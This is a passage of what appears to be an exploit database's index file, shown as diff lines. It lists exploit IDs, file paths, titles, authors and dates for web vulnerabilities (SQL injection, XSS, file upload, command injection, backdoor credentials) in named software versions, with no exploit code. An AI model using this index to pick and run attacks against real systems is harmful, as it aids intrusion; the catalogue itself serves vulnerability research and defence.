Disclosure",2012-06-18,"Sammy FORGIT",webapps,php, +37420,exploits/php/webapps/37420.txt,"VANA CMS - 'index.php' Script SQL Injection",2012-06-18,"Black Hat Group",webapps,php, +37565,exploits/php/webapps/37565.txt,"Mahara 1.4.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-02,anonymous,webapps,php, +37497,exploits/php/webapps/37497.txt,"Flogr - 'tag' Multiple Cross-Site Scripting Vulnerabilities",2012-07-09,Nafsh,webapps,php, +37423,exploits/php/webapps/37423.txt,"DeDeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,webapps,php, +37424,exploits/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",webapps,hardware, +37425,exploits/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change",2015-06-29,"Fady Mohammed Osman",webapps,hardware, +37430,exploits/php/webapps/37430.txt,"CMS Balitbang - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,webapps,php, +37431,exploits/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin - 'Uploadify.php' Arbitrary File Upload",2012-06-19,"Sammy FORGIT",webapps,php, +37432,exploits/php/webapps/37432.txt,"e107 Image Gallery Plugin - 'name' Remote File Disclosure",2012-06-19,"Sammy FORGIT",webapps,php, +37433,exploits/php/webapps/37433.txt,"AdaptCMS 2.0.2 - 'index.php' Script Cross-Site Scripting",2012-06-19,indoushka,webapps,php, +37434,exploits/php/webapps/37434.txt,"e107 Filedownload Plugin - Arbitrary File Upload / Remote File Disclosure",2012-06-19,"Sammy FORGIT",webapps,php, +37435,exploits/php/webapps/37435.txt,"web@all - Cross-Site Scripting",2012-06-20,"High-Tech Bridge",webapps,php, +37436,exploits/php/webapps/37436.txt,"Commentics - 'index.php' Cross-Site Scripting",2012-06-20,"Jean Pascal Pereira",webapps,php, +37437,exploits/php/webapps/37437.txt,"Coppermine Photo Gallery - 'index.php' Script SQL Injection",2012-06-20,"Taurus Omar",webapps,php, +37438,exploits/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 - Cross-Site Scripting",2012-06-21,"Sooraj K.S",webapps,php, +37439,exploits/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,webapps,php,80 +37441,exploits/jsp/webapps/37441.txt,"WedgeOS 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,webapps,jsp, +37442,exploits/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,webapps,linux,4434 +37443,exploits/php/webapps/37443.txt,"Joomla! Component com_szallasok - 'id' SQL Injection",2012-06-21,CoBRa_21,webapps,php, +37444,exploits/php/webapps/37444.txt,"Cotonti - 'admin.php' SQL Injection",2012-06-22,AkaStep,webapps,php, +37445,exploits/php/webapps/37445.txt,"CMS Lokomedia - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-06-22,the_cyber_nuxbie,webapps,php, +37446,exploits/php/webapps/37446.txt,"Fiyo CMS 2.0_1.9.1 - SQL Injection",2015-06-30,cfreer,webapps,php,80 +37447,exploits/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - Cross-Site Request Forgery",2015-06-30,"Wissam Bashour",webapps,asp, +37449,exploits/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",webapps,hardware, +37450,exploits/php/webapps/37450.txt,"Amazon S3 Uploadify Script - 'Uploadify.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",webapps,php, +37451,exploits/php/webapps/37451.txt,"Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",webapps,php, +37452,exploits/php/webapps/37452.txt,"WordPress Plugin Flip Book - 'PHP.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",webapps,php, +37453,exploits/php/webapps/37453.php,"Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload",2012-06-25,"Sammy FORGIT",webapps,php, +37454,exploits/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,webapps,hardware, +37499,exploits/php/webapps/37499.txt,"Phonalisa - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2012-07-12,"Benjamin Kunz Mejri",webapps,php, +37457,exploits/php/webapps/37457.html,"FCKEditor Core - 'Editor 'spellchecker.php'' Cross-Site Scripting",2012-06-25,"Emilio Pinna",webapps,php, +37459,exploits/php/webapps/37459.txt,"Umapresence - Local File Inclusion / Arbitrary File Deletion",2012-06-25,"Sammy FORGIT",webapps,php, +37460,exploits/php/webapps/37460.txt,"Schoolhos CMS - HTML Injection",2012-06-27,the_cyber_nuxbie,webapps,php, +37461,exploits/php/webapps/37461.txt,"DigPHP - 'dig.php' Script Remote File Disclosure",2012-06-26,"Ryuzaki Lawlet",webapps,php, +37464,exploits/php/webapps/37464.txt,"WordPress Plugin Albo Pretorio Online 3.2 - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",webapps,php,80 +37466,exploits/php/webapps/37466.php,"PHP-Fusion Advanced MP3 Player Infusion - 'upload.php' Arbitrary File Upload",2012-06-28,"Sammy FORGIT",webapps,php, +37467,exploits/jsp/webapps/37467.txt,"TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities",2012-06-28,"Rehan Ahmed",webapps,jsp, +37468,exploits/php/webapps/37468.php,"JAKCMS PRO 2.2.6 - 'uploader.php' Arbitrary File Upload",2012-06-29,"Sammy FORGIT",webapps,php, +37469,exploits/php/webapps/37469.txt,"LIOOSYS CMS - SQL Injection / Information Disclosure",2012-06-29,MustLive,webapps,php, +37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",webapps,multiple, +37472,exploits/php/webapps/37472.php,"Getsimple CMS Items Manager Plugin - 'PHP.php' Arbitrary File Upload",2012-07-02,"Sammy FORGIT",webapps,php, +40676,exploits/php/webapps/40676.txt,"My Little Forum 2.3.7 - Multiple Vulnerabilities",2016-11-01,"Ashiyane Digital Security Team",webapps,php, +37474,exploits/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload",2015-07-03,T0x!c,webapps,php,80 +37498,exploits/php/webapps/37498.txt,"Kajona - 'getAllPassedParams()' Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",webapps,php, +37476,exploits/php/webapps/37476.txt,"PHP MBB - Cross-Site Scripting / SQL Injection",2012-07-03,TheCyberNuxbie,webapps,php, +37479,exploits/php/webapps/37479.txt,"Classified Ads Script PHP - 'admin.php' Multiple SQL Injections",2012-07-04,snup,webapps,php, +37481,exploits/php/webapps/37481.txt,"WordPress Plugin SocialFit - 'msg' Cross-Site Scripting",2012-07-06,"Sammy FORGIT",webapps,php, +37482,exploits/php/webapps/37482.txt,"WordPress Plugin custom tables - 'key' Cross-Site Scripting",2012-07-03,"Sammy FORGIT",webapps,php, +37483,exploits/php/webapps/37483.txt,"WordPress Plugin church_admin - 'id' Cross-Site Scripting",2012-07-06,"Sammy FORGIT",webapps,php, +37484,exploits/php/webapps/37484.txt,"WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",webapps,php, +37485,exploits/php/webapps/37485.txt,"WordPress Plugin PHPFreeChat - 'url' Cross-Site Scripting",2012-07-05,"Sammy FORGIT",webapps,php, +37486,exploits/php/webapps/37486.txt,"sflog! - 'section' Local File Inclusion",2012-07-06,dun,webapps,php, +37488,exploits/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Open Redirection",2012-07-09,"Anastasios Monachos",webapps,asp, +37489,exploits/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injections",2012-07-09,"Stefan Schurtz",webapps,php, +37563,exploits/php/webapps/37563.html,"WordPress Plugin G-Lock Double Opt-in Manager - SQL Injection",2012-08-01,BEASTIAN,webapps,php, +37492,exploits/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Injection",2015-07-05,Vulnerability-Lab,webapps,ios, +37534,exploits/php/webapps/37534.txt,"WordPress Plugin Easy2Map 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",webapps,php,80 +37494,exploits/php/webapps/37494.txt,"WordPress Plugin S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,webapps,php, +37500,exploits/php/webapps/37500.txt,"Funeral Script PHP - Cross-Site Scripting / SQL Injection",2012-06-17,snup,webapps,php, +37501,exploits/php/webapps/37501.rb,"WordPress Plugin Generic - Arbitrary File Upload",2012-07-13,KedAns-Dz,webapps,php, +37502,exploits/php/webapps/37502.txt,"Elite Bulletin Board - Multiple SQL Injections",2012-07-15,ToXiC,webapps,php, +37503,exploits/php/webapps/37503.txt,"Event Calender PHP - Multiple Input Validation Vulnerabilities",2012-07-16,snup,webapps,php, +37504,exploits/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",webapps,android,8888 +37505,exploits/php/webapps/37505.txt,"Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",webapps,php, +37506,exploits/php/webapps/37506.php,"WordPress Plugin Post Recommendations - 'abspath' Remote File Inclusion",2012-07-16,"Sammy FORGIT",webapps,php, +37507,exploits/php/webapps/37507.txt,"web@all - 'name' Cross-Site Scripting",2012-07-16,"Sammy FORGIT",webapps,php, +37508,exploits/php/webapps/37508.txt,"Rama Zeiten CMS - 'download.php' Remote File Disclosure",2012-07-16,"Sammy FORGIT",webapps,php, +37509,exploits/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",webapps,php, +37511,exploits/php/webapps/37511.txt,"AVA VoIP - Multiple Vulnerabilities",2012-07-17,"Ibrahim El-Sayed",webapps,php, +37514,exploits/php/webapps/37514.txt,"WordPress Plugin ACF Frontend Display 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",webapps,php,80 +37515,exploits/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,webapps,php,80 +37516,exploits/hardware/webapps/37516.txt,"D-Link DSL-2750u / DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",webapps,hardware, +37519,exploits/php/webapps/37519.txt,"Joomla! Component com_hello - 'Controller' Local File Inclusion",2012-07-19,"AJAX Security Team",webapps,php, +37520,exploits/php/webapps/37520.txt,"Maian Survey - '/index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,webapps,php, +37521,exploits/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",webapps,php, +37522,exploits/php/webapps/37522.txt,"WordPress Plugin chenpress - Arbitrary File Upload",2012-07-21,Am!r,webapps,php, +37524,exploits/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,webapps,hardware,80 +37527,exploits/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W - OS Command Injection",2015-07-08,"Core Security",webapps,hardware, +37528,exploits/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",webapps,php,80 +37621,exploits/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",webapps,windows, +37530,exploits/php/webapps/37530.txt,"WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",webapps,php,80 +37531,exploits/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",webapps,hardware, +37532,exploits/hardware/webapps/37532.txt,"AirLive (Multiple Products) - OS Command Injection",2015-07-08,"Core Security",webapps,hardware,8080 +37533,exploits/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting",2015-07-08,"Paris Zoumpouloglou",webapps,asp,80 +37537,exploits/php/webapps/37537.txt,"phpProfiles - Multiple Vulnerabilities",2012-07-24,L0n3ly-H34rT,webapps,php, +37540,exploits/php/webapps/37540.txt,"Joomla! Component Odudeprofile 2.8 - 'profession' SQL Injection",2012-07-25,"Daniel Barragan",webapps,php, +37541,exploits/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,webapps,php, +37544,exploits/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Open Redirection",2012-07-29,"Aung Khant",webapps,php, +37547,exploits/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",webapps,php, +37548,exploits/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 - Arbitrary File Upload",2012-07-30,"Mario Ceballos",webapps,php, +37549,exploits/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass",2012-07-30,"Mario Ceballos",webapps,cgi, +37550,exploits/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence - Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",webapps,jsp, +37551,exploits/php/webapps/37551.txt,"phpBB - Multiple SQL Injections",2012-07-28,HauntIT,webapps,php, +37552,exploits/php/webapps/37552.txt,"JW Player - 'playerready' Cross-Site Scripting",2012-07-29,MustLive,webapps,php, +37553,exploits/php/webapps/37553.txt,"eNdonesia - 'cid' SQL Injection",2012-07-29,Crim3R,webapps,php, +37554,exploits/php/webapps/37554.txt,"Limny - 'index.php' Multiple SQL Injections",2012-07-31,L0n3ly-H34rT,webapps,php, +37555,exploits/java/webapps/37555.txt,"ManageEngine Applications Manager - Multiple SQL Injections",2012-08-01,"Ibrahim El-Sayed",webapps,java, +37556,exploits/php/webapps/37556.txt,"Distimo Monitor - Multiple Cross-Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",webapps,php, +37557,exploits/java/webapps/37557.txt,"ManageEngine Applications Manager - Multiple Cross-Site Scripting / SQL Injections",2012-08-01,"Ibrahim El-Sayed",webapps,java, +37559,exploits/php/webapps/37559.txt,"WordPress Plugin CP Image Store with Slideshow 1.0.5 - Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",webapps,php, +37560,exploits/php/webapps/37560.txt,"WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",webapps,php, +37567,exploits/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,webapps,php, +37569,exploits/multiple/webapps/37569.txt,"ntop - 'arbfile' Cross-Site Scripting",2012-08-03,"Marcos Garcia",webapps,multiple, +37570,exploits/multiple/webapps/37570.py,"Zenoss 3.2.1 - Authenticated Remote Command Execution",2012-07-30,"Brendan Coles",webapps,multiple, +37571,exploits/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Vulnerabilities",2012-07-30,"Brendan Coles",webapps,multiple, +37572,exploits/php/webapps/37572.txt,"Elefant CMS - 'id' Cross-Site Scripting",2012-08-03,PuN!Sh3r,webapps,php, +37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple, +37575,exploits/php/webapps/37575.txt,"Joomla! Component com_photo - Multiple SQL Injections",2012-08-06,"Chokri Ben Achor",webapps,php, +37577,exploits/asp/webapps/37577.txt,"PolarisCMS - 'WebForm_OnSubmit()' Cross-Site Scripting",2012-08-05,"Gjoko Krstic",webapps,asp, +37578,exploits/php/webapps/37578.txt,"Open Constructor - '/users/users.php?keyword' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",webapps,php, +37579,exploits/php/webapps/37579.txt,"Open Constructor - '/data/file/edit.php?result' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",webapps,php, +37580,exploits/php/webapps/37580.txt,"Open Constructor - 'confirm.php?q' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",webapps,php, +37581,exploits/php/webapps/37581.txt,"Dir2web - '/system/src/dispatcher.php?oid' SQL Injection",2012-08-07,"Daniel Correa",webapps,php, +37582,exploits/php/webapps/37582.py,"Mibew Messenger 1.6.4 - 'threadid' SQL Injection",2012-08-05,"Ucha Gobejishvili",webapps,php, +37583,exploits/php/webapps/37583.txt,"YT-Videos Script - 'id' SQL Injection",2012-08-06,3spi0n,webapps,php, +37584,exploits/php/webapps/37584.txt,"TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple SQL Injections",2012-08-07,"Chris Cooper",webapps,php, +37585,exploits/php/webapps/37585.txt,"TCExam 11.2.x - '/admin/code/tce_edit_question.php?subject_module_id' SQL Injection",2012-08-07,"Chris Cooper",webapps,php, +37586,exploits/php/webapps/37586.php,"PBBoard - Authentication Bypass",2012-08-07,i-Hmx,webapps,php, +37587,exploits/php/webapps/37587.txt,"Getsimple - 'path' Local File Inclusion",2012-08-07,PuN!Sh3r,webapps,php, +37588,exploits/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,webapps,php,80 +37589,exploits/java/webapps/37589.txt,"ConcourseSuite - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",webapps,java, +37590,exploits/php/webapps/37590.txt,"phpList 2.10.18 - 'unconfirmed' Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",webapps,php, +37591,exploits/php/webapps/37591.php,"AraDown - 'id' SQL Injection",2012-08-08,G-B,webapps,php, +37592,exploits/php/webapps/37592.php,"FreiChat 9.6 - SQL Injection",2015-07-13,"Kacper Szurek",webapps,php,80 +37594,exploits/php/webapps/37594.txt,"Arab Portal 3 - SQL Injection",2015-07-13,"ali ahmady",webapps,php,80 +37595,exploits/php/webapps/37595.txt,"phpVibe - Arbitrary File Disclosure",2015-07-13,"ali ahmady",webapps,php,80 +37596,exploits/php/webapps/37596.txt,"ArticleFR 3.0.6 - Multiple Vulnerabilities",2015-07-13,LiquidWorm,webapps,php,80 +37601,exploits/php/webapps/37601.txt,"WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",webapps,php,80 +37602,exploits/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",webapps,php,80 +37603,exploits/php/webapps/37603.txt,"WordPress Plugin CP Contact Form with Paypal 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",webapps,php,80 +37604,exploits/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",webapps,php,80 +37622,exploits/php/webapps/37622.txt,"WordPress Plugin Download Manager Free 2.7.94 & Pro 4 - Authenticated Persistent Cross-Site Scripting",2015-07-16,"Filippos Mastrogiannis",webapps,php, +37609,exploits/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,webapps,xml, +37610,exploits/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",webapps,php, +37613,exploits/php/webapps/37613.txt,"phpList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",webapps,php, +37614,exploits/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple SQL Injections",2012-08-08,"High-Tech Bridge",webapps,php, +37615,exploits/php/webapps/37615.txt,"PBBoard - 'member_id' Validation Password Manipulation",2012-08-08,"High-Tech Bridge",webapps,php, +37616,exploits/php/webapps/37616.txt,"PBBoard - 'admin.php?xml_name' Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",webapps,php, +37617,exploits/php/webapps/37617.txt,"dirLIST 0.3.0 - Local File Inclusion",2012-08-08,L0n3ly-H34rT,webapps,php, +37620,exploits/php/webapps/37620.txt,"Joomla! Component com_docman - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",webapps,php,80 +37623,exploits/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",webapps,hardware, +37624,exploits/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",webapps,hardware, +37625,exploits/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",webapps,hardware, +37626,exploits/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor / Remote Code Execution",2015-07-16,"Pierre Kim",webapps,hardware, +37629,exploits/php/webapps/37629.txt,"WordPress Plugin BuddyPress Activity Plus 1.5 - Cross-Site Request Forgery",2015-07-17,"Tom Adams",webapps,php,80 +37630,exploits/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injections / Cross-Site Scripting",2012-08-09,"Yakir Wizman",webapps,php, +37632,exploits/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter - Multiple Cross-Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",webapps,php, +37633,exploits/php/webapps/37633.txt,"mIRC - 'projects.php' Cross-Site Scripting",2012-08-10,TayfunBasoglu,webapps,php, +37634,exploits/php/webapps/37634.txt,"MindTouch DekiWiki - Multiple Local/Remote File Inclusions",2012-08-11,L0n3ly-H34rT,webapps,php, +37635,exploits/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host - Local File Inclusion",2012-08-10,L0n3ly-H34rT,webapps,php, +37636,exploits/php/webapps/37636.txt,"WordPress Theme ShopperPress - SQL Injection / Cross-Site Scripting",2012-08-02,"Benjamin Kunz Mejri",webapps,php, +37637,exploits/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,webapps,php, +37638,exploits/cgi/webapps/37638.txt,"LISTSERV 16 - 'SHOWTPL' Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",webapps,cgi, +37641,exploits/php/webapps/37641.txt,"JPM Article Blog Script 6 - 'tid' Cross-Site Scripting",2012-08-21,Mr.0c3aN,webapps,php, +37642,exploits/php/webapps/37642.txt,"SaltOS - 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",webapps,php, +37643,exploits/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Vulnerabilities",2012-08-27,anonymous,webapps,php, +37644,exploits/php/webapps/37644.txt,"Jara 1.6 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",webapps,php, +37645,exploits/php/webapps/37645.txt,"OrderSys 1.6.4 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",webapps,php, +37646,exploits/php/webapps/37646.txt,"Banana Dance - Cross-Site Scripting / SQL Injection",2012-08-22,"Canberk BOLAT",webapps,php, +37648,exploits/php/webapps/37648.txt,"Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,webapps,php, +37649,exploits/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,webapps,php, +37650,exploits/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' SQL Injection",2012-08-22,kallimero,webapps,php, +37651,exploits/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php, +37652,exploits/php/webapps/37652.txt,"KindEditor - 'name' Cross-Site Scripting",2012-08-23,LiquidWorm,webapps,php, +37653,exploits/php/webapps/37653.txt,"WordPress Plugin Rich Widget - Arbitrary File Upload",2012-08-22,Crim3R,webapps,php, +37654,exploits/php/webapps/37654.txt,"WordPress Plugin Monsters Editor for WP Super Edit - Arbitrary File Upload",2012-08-22,Crim3R,webapps,php, +37656,exploits/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Local File Inclusion",2012-08-23,"Corrado Liotta",webapps,php, +37659,exploits/php/webapps/37659.txt,"phpVibe < 4.20 - Persistent Cross-Site Scripting",2015-07-20,"Filippos Mastrogiannis",webapps,php, +37662,exploits/multiple/webapps/37662.txt,"AirDroid iOS / Android / Win 3.1.3 - Persistent",2015-07-20,Vulnerability-Lab,webapps,multiple, +37666,exploits/php/webapps/37666.txt,"Joomla! Component Helpdesk Pro < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",webapps,php,80 +37672,exploits/php/webapps/37672.txt,"JW Player - 'logo.link' Cross-Site Scripting",2012-08-29,MustLive,webapps,php, +37674,exploits/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Local File Inclusion",2012-08-24,"Yakir Wizman",webapps,php, +37675,exploits/php/webapps/37675.txt,"Joomla! Component Komento - 'cid' SQL Injection",2012-08-27,Crim3R,webapps,php, +37676,exploits/asp/webapps/37676.txt,"Power-eCommerce - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,webapps,asp, +37677,exploits/php/webapps/37677.txt,"WordPress Plugin Finder - 'order' Cross-Site Scripting",2012-08-25,Crim3R,webapps,php, +37678,exploits/asp/webapps/37678.txt,"Web Wiz Forums - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,webapps,asp, +37679,exploits/php/webapps/37679.txt,"LibGuides - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,webapps,php, +37680,exploits/php/webapps/37680.txt,"Mihalism Multi Host - 'users.php' Cross-Site Scripting",2012-08-25,Explo!ter,webapps,php, +37681,exploits/php/webapps/37681.txt,"WordPress Plugin Cloudsafe365 - 'file' Remote File Disclosure",2012-08-28,"Jan Van Niekerk",webapps,php, +37682,exploits/php/webapps/37682.txt,"WordPress Plugin Simple:Press Forum - Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",webapps,php, +37683,exploits/php/webapps/37683.txt,"Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",webapps,php, +37684,exploits/php/webapps/37684.html,"PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",webapps,php, +37686,exploits/multiple/webapps/37686.txt,"Hawkeye-G 3.0.1.4912 - Cross-Site Request Forgery",2015-07-24,hyp3rlinx,webapps,multiple, +37687,exploits/php/webapps/37687.txt,"TomatoCart - 'example_form.ajax.php' Cross-Site Scripting",2012-08-30,HauntIT,webapps,php, +37689,exploits/asp/webapps/37689.txt,"XM Forum - 'search.asp' SQL Injection",2012-08-30,Crim3R,webapps,asp, +37690,exploits/php/webapps/37690.txt,"Crowbar - 'file' Multiple Cross-Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",webapps,php, +37691,exploits/php/webapps/37691.txt,"SugarCRM Community Edition - Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",webapps,php, +37693,exploits/php/webapps/37693.txt,"Sitemax Maestro - SQL Injection / Local File Inclusion",2012-09-03,AkaStep,webapps,php, +37694,exploits/php/webapps/37694.txt,"Wiki Web Help - 'configpath' Remote File Inclusion",2012-08-04,L0n3ly-H34rT,webapps,php, +37695,exploits/php/webapps/37695.txt,"Sciretech (Multiple Products) - Multiple SQL Injections",2012-09-04,AkaStep,webapps,php, +37696,exploits/asp/webapps/37696.txt,"Cm3 CMS - 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,webapps,asp, +37697,exploits/php/webapps/37697.txt,"PHPFox 3.0.1 - 'ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-04,Crim3R,webapps,php, +37698,exploits/php/webapps/37698.txt,"Kayako Fusion - 'download.php' Cross-Site Scripting",2012-09-05,"High-Tech Bridge",webapps,php, +37700,exploits/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent Cross-Site Scripting / Information Leakage",2015-07-27,hyp3rlinx,webapps,multiple, +37826,exploits/php/webapps/37826.txt,"WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities",2012-09-18,AkaStep,webapps,php, +37751,exploits/php/webapps/37751.txt,"WordPress Plugin WPTF Image Gallery 1.03 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",webapps,php,80 +37752,exploits/php/webapps/37752.txt,"WordPress Plugin Recent Backups 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",webapps,php,80 +37705,exploits/php/webapps/37705.txt,"WordPress Plugin Unite Gallery Lite 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",webapps,php,80 +37707,exploits/php/webapps/37707.txt,"WordPress Plugin Count Per Day 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",webapps,php,80 +37708,exploits/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,webapps,php, +37709,exploits/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution",2015-07-28,hyp3rlinx,webapps,php, +37712,exploits/php/webapps/37712.txt,"phpFileManager 0.9.8 - Cross-Site Request 